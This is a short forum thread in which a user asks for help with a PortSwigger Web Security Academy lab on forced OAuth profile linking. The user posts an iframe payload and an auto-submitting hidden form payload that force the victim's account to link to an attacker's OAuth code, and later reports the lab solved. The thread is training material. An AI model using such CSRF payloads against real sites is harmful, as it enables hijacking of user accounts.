Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab "Forced OAuth profile linking" is not getting solved. How to solve it then?

Aakash | Last updated: Sep 27, 2024 06:43PM UTC

When I am using below payload then cookie is not sent along with the request and getting iframe with message that "lab app is refusing the request". <iframe src="https://0a83005c0369f127817ca8ff001300c0.web-security-academy.net/oauth-linking?code=841uImBSwuYzPkQK88YsM4ADbGD9-Ie0beYqr2nCNTh"> Also, tried below payload where cookie is sent along with the request and working for myself as well but not working with "Deliver exploit to victim" means when checking "login with social media" not getting admin access <html> <body> <form action="https://0a83005c0369f127817ca8ff001300c0.web-security-academy.net/oauth-linking"> <input type="hidden" name="code" value="2jfT3KmfKevO9B5cuRb1yzwT205CssB41GoDqFZRbe5" /> </form> <script> document.forms[0].submit(); </script> </body> </html>

Ben, PortSwigger Agent | Last updated: Oct 01, 2024 08:04AM UTC

Hi Aakash, Are you able to send us an email to support@portswigger.net and include some screenshots of the exact steps that you are carrying out so that we can see this more clearly?

Aakash | Last updated: Oct 04, 2024 01:30PM UTC

It has been solved. After some attempts with same procedure.

Aakash | Last updated: Oct 04, 2024 01:30PM UTC